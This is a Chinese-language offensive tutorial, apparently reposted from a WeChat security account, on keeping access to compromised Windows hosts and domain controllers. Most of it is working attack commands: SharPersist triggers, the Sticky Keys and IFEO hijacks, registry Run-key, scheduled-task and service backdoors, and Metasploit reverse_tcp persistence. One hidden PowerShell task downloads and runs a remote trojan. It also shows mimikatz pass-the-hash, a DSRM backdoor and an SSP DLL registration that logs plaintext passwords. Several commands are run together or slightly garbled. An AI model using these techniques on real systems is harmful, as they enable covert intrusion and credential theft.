配套练手靶场,全套安全课程及工具 ,搜索公众号:白帽子左一
WINDOWS
一、操作系统权限维持
SharPersist
用 C# 编写的 Windows 持久性工具包。下载链接:
https://github/fireeye/SharPersist/releases
功能
补充
keepass:一款管理密码的软件
启动文件夹
Windows系统都有一个“启动”文件夹,把需要打开的程序的快捷方式放到“启动”文件夹里,就可以实现开机自动启动。
如果想要实现应用程序在所有的用户登录系统后都能自动启动,就把该应用程序的快捷方式放到系统启动文件夹里;
如果想要实现某个应用程序只在某个用户登录系统时自动启动,那么就把该应用程序的快捷方式放到这个用户启动文件夹里。
系统启动文件夹
shell:CommonStartup
%programdata%\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
用户启动文件夹
shell:startup
%appdata%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
后续补充
操作指令
添加持久性触发器(添加)
keepass
SharPersist-t keepass -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml"-m add
注册表
1.SharPersist-t reg -c “C:\Windows\System32\cmd.exe”-a “/c calc.exe”-k “hkcurun”-v “Test Stuff”-m add
2.SharPersist-t reg -c “C:\Windows\System32\cmd.exe”-a “/c calc.exe”-k “hkcurun”-v “Test Stuff”-m add -o env
3.SharPersist-t reg -c “C:\Windows\System32\cmd.exe”-a “/c calc.exe”-k “logonscript”-m add
计划任务后门
SharPersist-t schtaskbackdoor -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-n "Something Cool"-m add
启动文件夹
SharPersist-t startupfolder -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-f "Some File"-m add
tortoisesvn
SharPersist-t tortoisesvn -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-m add
service
SharPersist-t service -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-n "Some Service"-m add
计划任务
SharPersist-t schtask -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-n "Some Task -m addSharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "SomeTask-m add -o hourly
添删除持久性触发器(删除)
通行证
SharPersist-t keepass -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml"-m remove
注册表
SharPersist-t reg -k "hkcurun"-v "Test Stuff"-m removeSharPersist -t reg -k "hkcurun"-v "Test Stuff"-m remove -o envSharPersist -t reg -k "logonscript"-m remove
计划任务后门
SharPersist-t schtaskbackdoor -n "Something Cool"-m remove
启动文件夹
SharPersist-t startupfolder -f "Some File"-m remove
tortoisesvn
SharPersist-t tortoisesvn -m remove
service
SharPersist-t service -n "Some Service"-m remove
计划任务
SharPersist-t schtask -n "Some Task"-m remove
添执行持久性触发器的试运行(检查)
通行证
SharPersist-t keepass -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml"-m check
注册表
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m checkSharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m check -o envSharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m check
计划任务后门
SharPersist-t schtaskbackdoor -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-n "Something Cool"-m check
启动文件夹
SharPersist-t startupfolder -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-f "Some File"-m check
tortoisesvn
SharPersist-t tortoisesvn -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-m check
service
SharPersist-t service -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-n "Some Service"-m check
计划任务
SharPersist-t schtask -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-n "Some Task"-m checkSharPersist -t schtask -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-n "Some Task"-m check -o hourly
添列出持久性触发器条目(列表)
注册表
SharPersist-t reg -k "hkcurun"-m list
计划任务后门
SharPersist-t schtaskbackdoor -m listSharPersist -t schtaskbackdoor -m list -n "Some Task"SharPersist-t schtaskbackdoor -m list -o logon
启动文件夹
SharPersist-t startupfolder -m list
service
SharPersist-t service -m listSharPersist -t service -m list -n "Some Service"
计划任务
SharPersist-t schtask -m listSharPersist -t schtask -m list -n "Some Task"SharPersist-t schtask -m list -o logon
辅助功能
辅助功能提供了其他选项(屏幕键盘、放大镜、屏幕阅读等),可以帮助残疾人更轻松地使用Windows操作系统但是,此功能可能会被滥用,以在已启用RDP且已获得管理员级别权限的主机上实现持久性。
注意:在远程操作时,需要目标开启远程桌面服务,且能进入远程登录界面,2003 2008 2012 是有登录界面的,2016就没了
屏幕键盘:C:\Windows\System32\osk.exe
放大镜:C:\Windows\System32\Magnify.exe
旁白:C:\Windows\System32\Narrator.exe
显示开关:C:\Windows\System32\DisplaySwitch.exe
应用程序开关:C:\Windows\System32\AtBroker.exe
粘滞键:C:\Windows\System32\sethc.exe
辅助功能:C:\Windows\System32\utilman.exe
粘滞键
在Windows主机上连续按5次”Shift”键,即可调用出粘滞键,只要用木马或cmd.exe替换C:\Windows\System32目录下的sethc.exe即可
命令行操作
cd C:\Windows\System32
del sethc.exe
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe
msf
use post/windows/manage/sticky_keys设置后门
use post/windows/manage/enable_rdp开启RDP服务
msf6 exploit(multi/handler)>use post/windows/manage/sticky_keysmsf6 post(windows/manage/sticky_keys)> options Module options (post/windows/manage/sticky_keys):NameCurrentSettingRequiredDescription-------------------------------------- EXE %SYSTEMROOT%\system32\cmd. yes Executable to execute when the exploit is trig exe gered. SESSION yes The session to run thismodule on. TARGET SETHC yes The target binary to add the exploit to.(Acce pted: SETHC, UTILMAN, OSK, DISP)msf6 post(windows/manage/sticky_keys)>use post/windows/manage/enable_rdpmsf6 post(windows/manage/enable_rdp)> options Module options (post/windows/manage/enable_rdp):NameCurrentSettingRequiredDescription-------------------------------------- ENABLE truenoEnable the RDP ServiceandFirewallException. FORWARD falsenoForward remote port 3389 to localPort. LPORT 3389noLocal port to forward remote connection. PASSWORD noPasswordfor the user created. SESSION yes The session to run thismodule on. USERNAME noThe username of the user to create.
映像劫持
映像劫持,也被称为“IFEO”(Image File Execution Options)。
当目标程序被映像劫持时,双击目标程序,系统会转而运行劫持程序,并不会运行目标程序。许多病毒会利用这一点来抑制杀毒软件的运行,并运行自己的程序。
造成映像劫持的罪魁祸首就是参数Debugger,它是IFEO里第一个被处理的参数,系统如果发现某个程序文件在IFEO列表中,它就会首先来读取Debugger参数
如果该参数不为空,系统则会把Debugger参数里指定的程序文件名作为用户试图启动的程序执行请求来处理,而仅仅把用户试图启动的程序作为Debugger参数里指定的程序文件名的参数发送过去。
参数“Debugger”本来是为了让程序员能够通过双击程序文件直接进入调试器里调试自己的程序。
现在却成了病毒的攻击手段。
简单操作就是修改注册表,在HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option中添加utilman.exe项,在此项中添加debugger键,键值为要启动的程序路径。
操作步骤
step1:在HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options新建utilman.exe项,在此项中添加Debugger键即可
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\utilman.exe” /v “Debugger” /t REG_SZ /d
“C:\Users\Administrator\Downloads\test.exe” /f
讲述人
按下“提供讲述人反馈”组合键,就会打开触发注册表中定义的恶意命令的机会,优点如下
无文件(powershell)
不需要管理权限(如果物理访问场景和受害者用户被锁定)
操作步骤 1 -(win10测试登录界面无法触发,进入后可以触发)
step1:首先开启目标的讲述人(Narator.exe)功能,讲述人开启会有声音,通过配置将声音关掉等其它配置
step2:如图记住开启反馈中心(feedback-hub)的快捷键
step3:在注册表中搜索HKCR\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\windows.protocol\feedback-hub找到通用应用程序 ID,比如这里的时AppXsbz2fdbdmn6pz7xyd3zc95j9syhcnyc2
注:搜索资料,有点会有两个项,而互联网上的资料利用的都是AppXypsaf9f1qserqevf0sws76dx4k9a5206
step4:访问
HKCU\SOFTWARE\Classes\AppXsbz2fdbdmn6pz7xyd3zc95j9syhcnyc2\Shell\open\command
step5:删除DelegateExecute,修该默认值regsvr32 C:\tool\test.dll,为启动木马,但时进入桌面后能运行,在登录界面启动会弹出如下界面
step6: 测试修改AppXypsaf9f1qserqevf0sws76dx4k9a5206,结果仍然如此
注册表后门
测试语句
注意:add 和delete 操作HKLM需要高权限,query不需要
Run RunOnce RunServices RunServicesOnce
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “test”
/t REG_SZ /d “C:\Windows\System32\notepad.exe” /freg add “HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce” /v
“test” /t REG_SZ /d “C:\Windows\System32\notepad.exe” /freg query “HKLM\Software\Microsoft\Windows\CurrentVersion\run” /v
“test”reg delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v
“test” /f
注意:也可以是dll 文件,使用regsvr32 执行dll 文件
注册表基础
注册表是windows操作系统中的一个核心数据库,其中存放着各种参数,直接控制着windows的启动、硬件驱动程序的装载以及一些windows应用程序的运行,从而在整个系统中起着核心作用。
这些作用包括了软、硬件的相关配置和状态信息,比如注册表中保存有应用程序和资源管理器外壳的初始条件、首选项和卸载数据等
联网计算机的整个系统的设置和各种许可,文件扩展名与应用程序的关联,硬件部件的描述、状态和属性,性能记录和其他底层的系统状态信息,以及其他数据等。
Win+r 输入regedit进入注册表编辑器
如下是控制计算机启动项的注册表信息。
Run中的程序是WINDOWS初始化后才运行的,而RunService中的程序是在操作系统启动时就开始运行的,也就是说RunServices中的程序先于Run中的程序运行,如电源管理程序。
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\wow6432node\microsoft\windows\currentversion\Run
HKLM=HKEY_LOCAL_MACHINE,是机器软硬件信息的集散地HKCU=HKEY_CURRENT_USER,是当前用户所用信息储存地。
HKCR=HKEY_CLASSES_ROOT:文件关联相关信息。 HKU=HKEY_USERS:所有用户信息。
HKCC=HKEY_CURRENT_CONFIG:当前系统配置。REG ADD “KeyName” /v “ValueName” /t REG_SZ /d “Data” /f 操作HKLM 需要高权限
KeyName [\Machine]FullKey Machine 远程机器名 - 忽略默认到当前机器。远程机器上 只有 HKLM 和
HKU 可用。 FullKey ROOTKEY\SubKey ROOTKEY [ HKLM | HKCU | HKCR | HKU |
HKCC ] SubKey 所选 ROOTKEY 下注册表项的完整名称。 /v 所选项之下要添加的值名称。 /ve
为注册表项添加空白值名称(默认)。 /t RegKey 数据类型 REG_SZ型注册表值项没有长度限制 /d 要分配给添加的注册表
ValueName 的数据。 /f 不用提示就强行覆盖现有注册表项。reg query “KeyName” \v ValueName 不需要权限
reg delete “KeyName” \v ValueName /f 操作HKLM 需要高权限 /f
不用提示,强制删除。不加会询问是否删除
操作
图形化操作
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run是控制计算机启动项的注册表信息,可以直接在里面随便取个键名,
命令行操作
添加新的注册表启动项
普通用户可操作reg add
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”/v
“test”/t REG_SZ /d “C:\Users\Administrator\Downloads\1.exe”/f高权限操作reg
add
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce”/v
“test”/t REG_SZ /d “C:\Windows\System32\notepad.exe”/f
下图为设置某软件开机自启图
msf
run persistence -U -P windows/meterpreter/reverse_tcp -p 4444 -r
192.168.174.132meterpreter > run persistence -h OPTIONS:
-L 写入脚本的位置,默认是%TEMP%
-P Payload,默认是 windows/meterpreter/reverse_tcp.
-U HKCU
-X KKLM
-p 监听端口
-r 监听地址use exploit/windows/local/persistence
**注意:**在某些操作系统中,会有HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce其中的启动项为一次性,重启后会消失,如果没有该路径,可以添加。
计划任务后门
计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而使我们获得目标系统的控制权。
计划任务的持久化技术可以手动实现,也可以自动实现。
有效负载可以从磁盘或远程位置执行,它们可以是可执行文件、powershell脚本或scriptlet的形式。
测试语句
at 17:28:00 /every:W C:\Users\Administrator\Downloads\test.exe at at
/del /yesschtasks /create /tn test /sc minute /mo 1 /tr
c:\windows\system32\backdoor.exe /ru system /f SCHTASKS /Create /SC
DAILY /TN gaming /TR c:\freecell /ST 12:00 /ET 14:00 /K schtasks
/Query schtasks /Query /tn test /v SCHTASKS /Delete /TN test /F
文件路径中可以加入空格,但需要加上两组引号,一组引号用于 CMD.EXE,另一组用于 SchTasks.exe。用于
CMD的外部引号必须是一对双引号;内部引号可以是一对单引号或一对转义双引号:SCHTASKS /Create /tr
“‘c:\program files\internet explorer\iexplorer.exe’ \”c:\log
data\today.xml\””
at
at 命令是Windows自带的用于创建计划任务的命令,但是他主要工作在W2K8之前版本的操作系统中。
我们可以通过at命令通过跳板机在目标主机DC上创建计划任务,让计算机在指定的时间执行木马程序,从而获得对内网目标主机的控制。
at 17:28:00 /every:W C:\Users\Administrator\Downloads\test.exe
计划任务创建成功,目标主机将在每周三的17:28:00执行后门程序
星期一 Mon.(全称Monday)星期二 Tues.(全称Tuesday) 星期三 Wed.(全称Wednesday)星期四
Thur.(全称Thursday)星期五 Fri.(全称Friday)星期六 Sat.(全程Saturday)星期日
Sun.(全称Sunday)
at 17:28:00 /every:W C:\Users\Administrator\Downloads\test.exe 添加计划任务
at 列出所有计划任务
at /del /yes 无提醒删除所有计划任务
schtasks
以 system 权限创建一个名为 backdoor 的计划任务,该计划任务每分钟启动一次,启动程序为C盘下的backdoor.exe
schtasks /create /tn test /sc minute /mo 1 /tr
c:\windows\system32\backdoor.exe /ru system /f创建计划任务 “gaming”,每天从 12:00 点开始到14:00 点自动结束,运行 freecell.exe SCHTASKS
/Create /SC DAILY /TN gaming /TR c:\freecell /ST 12:00 /ET 14:00 /Kschtasks /Query win7 w2k8 无法加载资源列表,修改编码 chcp 437
schtasks /Query /tn test /v 查询名为 test 的计划任务的详细信息
SCHTASKS /Delete /TN test /F
文件路径中可以加入空格,但需要加上两组引号,一组引号用于 CMD.EXE,另一组用于 SchTasks.exe。
用于 CMD的外部引号必须是一对双引号;
内部引号可以是一对单引号或一对转义双引号:SCHTASKS /Create /tr “‘c:\program files\internet explorer\iexplorer.exe’ \”c:\log data\today.xml\””
/Create 创建新计划任务。/Delete 删除计划任务。/Query 显示所有计划任务。/Change 更改计划任务属性。
/TN taskname 以路径\名称形式指定对此计划任务进行唯一标识的字符串。/F 如果指定的任务已经存在,则强制创建任务并抑制警告。
/SC schedule 指定计划频率。有效计划任务: MINUTE、 HOURLY、DAILY、WEEKLY、 MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, ONEVENT;分钟、每小时、每天、每周、每月、一次,开始时、登录时、空闲时、事件时。/MO modifier 改进计划类型以允许更好地控制计划重复周期。有效值列于下面“修改者”部分中。MINUTE: 1 到 1439 分钟。HOURLY: 1 - 23 小时。DAILY: 1 到 365 天。WEEKLY: 1 到 52 周。ONCE: 无修改者。ONSTART: 无修改者。ONLOGON: 无修改者。ONIDLE: 无修改者。MONTHLY: 1 到 12,或FIRST, SECOND, THIRD, FOURTH, LAST, LASTDAY。/TR taskrun 指定在这个计划时间运行的程序的路径和文件名。例如: C:\windows\system32\calc.exe/RU username 指定任务在其下运行的“运行方式”用户帐户(用户上下文)。对于系统帐户,有效值是 ""、"NT AUTHORITY\SYSTEM" 或"SYSTEM"。对于 v2 任务,"NT AUTHORITY\LOCALSERVICE"和"NT AUTHORITY\NETWORKSERVICE"以及常见的 SID对这三个也都可用。
/
ST starttime 指定运行任务的开始时间。时间格式为 HH:mm (24 小时时间),例如 14:30 表示2:30
PM。如果未指定 /ST,则默认值为当前时间。/SC ONCE 必需有此选项。/DU duration 指定运行任务的持续时间。时间格式为 HH:mm。这不适用于 /ET 和计划类型: ONSTART,
ONLOGON, ONIDLE, ONEVENT.对于 /V1 任务,如果已指定 /RI,则持续时间默认值为1 小时。/V 显示详细任务输出。
/XML [xml_type] 以 XML 格式显示任务定义。
如果 xml_type 为 ONE,则输出为一个有效 XML 文件。如果 xml_type 不存在,则输出将为有 XML 任务定义的串联。
预留
计划任务涉及的指令太多了,这里直接丢两个windows的帮助文档:
计划任务帮助文档:https://docs.microsoft/zh-cn/search/?terms=schtasks
https://docs.microsoft/zh-cn/windows-server/administration/windows-commands/schtasks-create
schtasks /create /sc minute /mo 1 /tn "Security Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://ip/木马.ps1\"\"\"))\""
这是个一分钟执行一次的计划,因为cmd命令行执行单引号会被替换成双引号,故这里使用三个双引号替代
计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而使我们获得目标系统的控制权。
计划任务的持久化技术可以手动实现,也可以自动实现。
有效负载可以从磁盘或远程位置执行,它们可以是可执行文件、powershell脚本或scriptlet的形式。
服务自启动
测试语句
SC create backdoor binpath=”C:\Windows\Help\Help\servrcs.exe” start=
auto displayname= “Plugins Transfer Service”sc query backdoor
sc delete backdoor
create----------创建服务(并将其添加到注册表中)。query-----------查询服务的状态,或枚举服务类型的状态。delete ----------(从注册表中)删除服务。
注意: 选项名称包括等号。等号和值之间需要一个空格。binPath= <.exe 文件的 BinaryPathName>start= <boot|system|auto|demand|disabled|delayed-auto>(默认 = demand) DisplayName= <显示名称> 指定一个友好名称,用于标识用户界面程序中的服务。 例如,一个特定服务的子项名称是 wuauserv,它具有更友好的显示名称自动更新。
后续补充
sc作用是在注册表和服务数据库中创建服务项,微软查到的意思是为注册表中的服务和服务控制管理器数据库创建子项和项
这里给个官方的用法:
sc.exe [] config [] [type= {own | share |
kernel | filesys | rec | adapt | interact type= {own | share}}]
[start= {boot | system | auto | demand | disabled | delayed-auto}]
[error= {normal | severe | critical | ignore}] [binpath=
] [group= ] [tag= {yes | no}] [depend=
] [obj= { | }] [displayname=
] [password= ]
二、域控制器权限持久化分析
DSERM 域后门
DSRM( Directory Services Restore Mode,目录服务恢复模式)是AD上的一项功能,是Windows域环境中域控制器的安全模式启动选项,可使服务器脱机以进行紧急维护
尤其是还原 AD 对象的备份,在域环境中出现故障或崩溃时还原、修复、重建活动目录数据库,使域环境的运行恢复正常。
在 w2k中,DSRM 密码通常创建为空值(空白),这也是故障恢复控制台密码;从w2k3开始,升级域控制器时必须定义 DSRM 密码;不过在w2k3之前不能用于持久化操作。
2k8需要安装KB961320才可以使用指定域账号的密码对DSRM的密码进行同步;在2k8以后版木的系统中不需要安装此补丁。
每个域控制器都有本地管理员账号和密码,也就是DSRM账户,它可以通过网络连接城控制器,进而控制域控制器,微软公布了修改DSRM账户的方法,在DC上运行ntdsutil命令行工具。
操作步骤
直接获得密码然后登陆
step1: 在域控中使用mimikatz 获取本地管理员的NTLM Hash
privilege::debugtoken::elevatelsadump::sam
比如我这里得到的是7ec128659901d71d91fe1f82db886cce
step2: 在任意一个与机器内用管理员启动mimikatz
privilege::Debugsekurlsa::pth /domain:DC /user:administrator /ntlm:7ec128659901d71d91fe1f82db886cce
此时会弹出一个窗口,此窗口有权限访问域控
将DSRM的密码和起他账号进行同步
查看 krbtgt NTLM值 privilege::debuglsadump::lsa /patch /name:krbtgt查看 本地账户的 NTLM值 token::elevatelsadump::sam
如图显示不一样
接下来进行同步,
NTDSUTILset DSRM passwordsync from domain account krbtgt
同步完成
SSP维持域控制权限
SSP(Security Support Provider)是Windows操作系统安全机制的提供者。
ssp本质一个用于身份验证的 dll,系统在启动时 SSP 会被加载到 lsass.exe 进程中,lsass.exe作为Windows系统进程,用于本地安全和登录策略;在系统启动时,SSP将被加载到lsass.exe进程中。
当我们获得了网络中目标机器的system权限,我们可以尝试自定义了恶意DLL文件,比如mimikatz 中mimilib.dll, 文件在系统启动时将其加载到lsass.exe进程中,就能够获取lsass.exe进程中的明文密码。
这样,即使用户更改密码并重新登录,攻击者依然可以获取该账号的新密码。
操作步骤
直接将dll 注入到进程中
privilege::debugmisc::memssp
明文密码的日志在C:\Windows\system32\mimilsa.log,
这样虽然不会留下痕迹,但是重启就会失效。
持久化操作
将mimikatz中的mimilib.dll 放到系统的C:\Windows\system32目录下(DLL的位数需要与windows位数相同),并将mimilib.dll添加到注册表中。
copy mimilib.dll %systemroot%\system32reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
使用此方法即使系统重启,也不会影响到持久化的效果。
更多推荐
操作系统权限维持
发布评论